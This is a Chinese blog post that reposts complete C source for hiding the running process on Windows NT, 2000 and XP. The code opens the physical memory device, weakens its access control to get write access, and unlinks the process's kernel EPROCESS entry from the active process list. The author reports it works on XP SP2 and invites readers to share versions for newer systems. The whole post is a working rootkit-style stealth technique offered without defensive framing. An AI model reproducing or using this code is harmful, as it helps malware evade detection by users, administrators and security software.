网上流传的《在2000和XP下隐藏进程》这篇文章,我想找原始出处却没有一篇有注明的,想必文章发表时没有附带出处,失传了吧。我整理了一下这篇文章里的代码,在VC2008下调试通过,在XP SP2下测试可用,确实隐藏掉自身进程了。程序是通过修改物理内存,似乎是摘除自身在系统中的信息,来实现隐藏的。兼容性也就比较差了,只能在2000和XP下有效,如果有朋友研究到2003及以后版本系统的方案,希望可以公开交流交流。
#include
"
stdafx.h
"
#include
<
windows.h
>
#include
<
tchar.h
>
#include
<
Aclapi.h
>
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
#define
dprintf _tprintf
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
//
A process has requested access to an object, but has not been granted those access rights.
#define
STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
#define
NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
typedef
struct
_UNICODE_STRING
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
{
USHORT Length;
USHORT MaximumLength;
#ifdef MIDL_PASS
[size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
PWSTR Buffer;
#endif // MIDL_PASS
}
UNICODE_STRING,
*
PUNICODE_STRING;
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
typedef
struct
_OBJECT_ATTRIBUTES
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor; // Points to type SECURITY_DESCRIPTOR
PVOID SecurityQualityOfService; // Points to type SECURITY_QUALITY_OF_SERVICE
}
OBJECT_ATTRIBUTES,
*
POBJECT_ATTRIBUTES;
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
typedef NTSTATUS (NTAPI
*
NTOPENSECTION)(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes
);
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
typedef VOID (NTAPI
*
RTLINITUNICODESTRING)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
bool
InitNTDLL();
void
CloseNTDLL();
bool
SetPhyscialMemorySectionCanBeWrited(HANDLE hSection);
HANDLE OpenPhysicalMemory();
void
ClosePhysicalMemory();
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr);
ULONG GetData(PVOID addr);
bool
SetData(PVOID addr, ULONG data);
bool
HideCurrentProcess();
BOOL EnablePrivilege(LPCTSTR pPrivName, BOOL bEnable
=
TRUE);
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
HMODULE g_hNtDLL
=
NULL;
NTOPENSECTION NtOpenSection
=
NULL;
RTLINITUNICODESTRING RtlInitUnicodeString
=
NULL;
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
OSVERSIONINFO g_osvi
=
{0}
;
HANDLE g_hMPM
=
NULL;
PVOID g_pMapPhysicalMemory
=
NULL;
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
void
_tmain(
int
argc, _TCHAR
*
argv[])
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
{
_tsetlocale(0, _T("chs"));
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
_tprintf(_T("隐藏当前进程%s\n"),
HideCurrentProcess() ? _T("成功") : _T("失败"));
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
_tprintf(_T("\n请按任意键退出. . ."));
_getwch();
}
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
bool
InitNTDLL()
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
{
g_hNtDLL = LoadLibrary(_T("ntdll.dll"));
if (g_hNtDLL == NULL)
return false;
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
NtOpenSection = (NTOPENSECTION)GetProcAddress(g_hNtDLL, "NtOpenSection");
RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress(g_hNtDLL, "RtlInitUnicodeString");
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
return (NtOpenSection != NULL && RtlInitUnicodeString != NULL);
}
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
void
CloseNTDLL()
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
{
if (g_hNtDLL != NULL)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
FreeLibrary(g_hNtDLL);
g_hNtDLL = NULL;
}
}
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
bool
SetPhyscialMemorySectionCanBeWrited(HANDLE hSection)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
{
PACL pDacl = NULL;
PACL pNewDacl = NULL;
PSECURITY_DESCRIPTOR pSD = NULL;
DWORD dwResult = ERROR_SUCCESS;
EXPLICIT_ACCESS ea;
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
dwResult = GetSecurityInfo(
hSection,
SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION,
NULL,
NULL,
&pDacl,
NULL,
&pSD);
if (dwResult != ERROR_SUCCESS)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
dprintf(_T("GetSecurityInfo Error=%lu\n"), dwResult);
goto __End;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions = SECTION_MAP_WRITE;
ea.grfAccessMode = GRANT_ACCESS;
ea.grfInheritance= NO_INHERITANCE;
ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType = TRUSTEE_IS_USER;
ea.Trustee.ptstrName = _T("CURRENT_USER");
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
dwResult = SetEntriesInAcl(1, &ea, pDacl, &pNewDacl);
if (dwResult != ERROR_SUCCESS)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
dprintf(_T("SetEntriesInAcl Error=%lu\n"), dwResult);
goto __End;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
dwResult = SetSecurityInfo(
hSection,
SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION,
NULL,
NULL,
pNewDacl,
NULL);
if (dwResult != ERROR_SUCCESS)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
dprintf(_T("SetSecurityInfo Error=%lu\n"), dwResult);
goto __End;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
__End:
if (pDacl != NULL)
LocalFree(pDacl);
if (pNewDacl != NULL)
LocalFree(pNewDacl);
if (pSD != NULL)
LocalFree(pSD);
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
return (dwResult == ERROR_SUCCESS);
}
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
HANDLE OpenPhysicalMemory()
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
{
HANDLE hResult = NULL;
NTSTATUS status = -1;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
ULONG PhyDirectory = 0;
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&g_osvi);
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
if (g_osvi.dwMajorVersion == 5)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
switch (g_osvi.dwMinorVersion)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
case 0: // 2000
PhyDirectory = 0x30000;
break;
case 1: // XP
case 2: // 2003
PhyDirectory = 0x39000;
break;
}
}
else if (g_osvi.dwMajorVersion == 4 && g_osvi.dwMinorVersion == 0 && g_osvi.dwPlatformId == 2) // NT
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
PhyDirectory = 0x30000;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
if (PhyDirectory == 0)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
dprintf(_T("不支持当前操作系统, 版本: %lu.%lu.%lu\n"),
g_osvi.dwMajorVersion,
g_osvi.dwMinorVersion,
g_osvi.dwBuildNumber);
goto __End;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory");
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
status = NtOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);
if(status == STATUS_ACCESS_DENIED)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
dprintf(_T("NtOpenSection access denied\n"));
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
status = NtOpenSection(&g_hMPM, READ_CONTROL | WRITE_DAC, &attributes);
if (NT_SUCCESS(status))
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status = NtOpenSection(&g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, &attributes);
}
}
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
if (!NT_SUCCESS(status))
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
dprintf(_T("NtOpenSection Error=0x%X\n"), (DWORD)status);
goto __End;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE, 0, PhyDirectory, 0x1000);
if (g_pMapPhysicalMemory == NULL)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
dprintf(_T("MapViewOfFile Error=%lu\n"), GetLastError());
goto __End;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
hResult = g_hMPM;
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
__End:
return hResult;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
void
ClosePhysicalMemory()
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
{
if (g_pMapPhysicalMemory != NULL)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
UnmapViewOfFile(g_pMapPhysicalMemory);
g_pMapPhysicalMemory = NULL;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
if (g_hMPM != NULL)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
CloseHandle(g_hMPM);
g_hMPM = NULL;
}
}
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
{
ULONG VAddr = (ULONG)addr;
ULONG PGDE = BaseAddress[VAddr >> 22];
ULONG PTE = 0;
ULONG PAddr = 0;
ULONG tmp = PGDE & 0x00000080;
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
if ((PGDE & 1) == 0)
return NULL;
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
if (tmp != 0)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
}
else
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
PGDE = (ULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ, 0, PGDE & 0xFFFFF000, 0x1000);
if (!PGDE)
return NULL;
PTE = ((PULONG)PGDE)[(VAddr & 0x003FF000) >> 12];
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
if ((PTE & 1) == 0)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
UnmapViewOfFile((PVOID)PGDE);
return NULL;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
PAddr = (PTE & 0xFFFFF000) + (VAddr & 0x00000FFF);
UnmapViewOfFile((PVOID)PGDE);
}
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
return (PVOID)PAddr;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
ULONG GetData(PVOID addr)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
{
ULONG ret = 0;
ULONG phys = 0;
PULONG tmp = 0;
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
if (!phys)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
_tprintf(_T("GetData LinearToPhys return 0\n"));
return ret;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE, 0, phys & 0xFFFFF000, 0x1000);
if (tmp != NULL)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
ret = tmp[(phys & 0xFFF) >> 2];
UnmapViewOfFile(tmp);
}
else
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
_tprintf(_T("GetData MapViewOfFile return NULL\n"));
}
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
return ret;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
bool
SetData(PVOID addr, ULONG data)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
{
ULONG phys = 0;
PULONG tmp = 0;
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, addr);
if (!phys)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
_tprintf(_T("SetData LinearToPhys return 0\n"));
return false;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xFFFFF000, 0x1000);
if (tmp == NULL)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
_tprintf(_T("SetData MapViewOfFile return NULL\n"));
return false;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
tmp[(phys & 0xFFF) >> 2] = data;
UnmapViewOfFile(tmp);
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
return true;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
bool
HideCurrentProcess()
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
{
ULONG fw = 0;
ULONG bw = 0;
ULONG thread = 0;
ULONG process = 0;
static bool bHidden = false;
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
if (bHidden)
return bHidden;
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
EnablePrivilege(SE_SECURITY_NAME);
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
if (!InitNTDLL() || OpenPhysicalMemory() == NULL)
goto __End;
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
thread = GetData((PVOID)0xFFDFF124); // Read the ETHREAD struct
if (!thread)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
_tprintf(_T("thread=0\n"));
goto __End;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
process = GetData((PVOID)(thread + 0x44)); // Read the EPROCESS struct
if (!process)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
_tprintf(_T("process=0\n"));
goto __End;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
if (g_osvi.dwMajorVersion == 5)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
switch (g_osvi.dwMinorVersion)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
case 0: // 2000
fw = GetData((PVOID)(process + 0xA0));
bw = GetData((PVOID)(process + 0xA4));
break;
case 1: // XP
fw = GetData((PVOID)(process + 0x88));
bw = GetData((PVOID)(process + 0x8C));
break;
case 2: // 2003
fw = GetData((PVOID)(process + 0x8A));
bw = GetData((PVOID)(process + 0x8E));
break;
}
}
else if (g_osvi.dwMajorVersion == 4 && g_osvi.dwMinorVersion == 0 && g_osvi.dwPlatformId == 2) // NT
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
fw = GetData((PVOID)(process + 0x98));
bw = GetData((PVOID)(process + 0x9C));
}
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
if (fw && bw)
bHidden = (SetData((PVOID)(fw + 4), bw) && SetData((PVOID)bw, fw));
else
_tprintf(_T("fw=%lu, bw=%lu\n"), fw, bw);
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
__End:
CloseNTDLL();
ClosePhysicalMemory();
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
EnablePrivilege(SE_SECURITY_NAME, FALSE);
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
return bHidden;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/None.gif)
BOOL EnablePrivilege(LPCTSTR pPrivName, BOOL bEnable)
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedBlockStart.gif)
{
BOOL bReturn = FALSE;
HANDLE hToken = NULL;
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
LUID uidName =
{0};
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
TOKEN_PRIVILEGES tpToken =
{0};
DWORD dwReturn = 0;
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
return bReturn;
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
if (!LookupPrivilegeValue(NULL, pPrivName, &uidName))
![](https://www.cnblogs.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
{
CloseHandle(hToken);
return bReturn;
}
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
tpToken.PrivilegeCount = 1;
tpToken.Privileges[0].Luid = uidName;
tpToken.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : SE_PRIVILEGE_REMOVED;
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
bReturn = AdjustTokenPrivileges(hToken, FALSE, &tpToken, sizeof(TOKEN_PRIVILEGES), NULL, &dwReturn);
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
CloseHandle(hToken);
![](https://www.cnblogs.com/Images/OutliningIndicators/InBlock.gif)
return bReturn;
}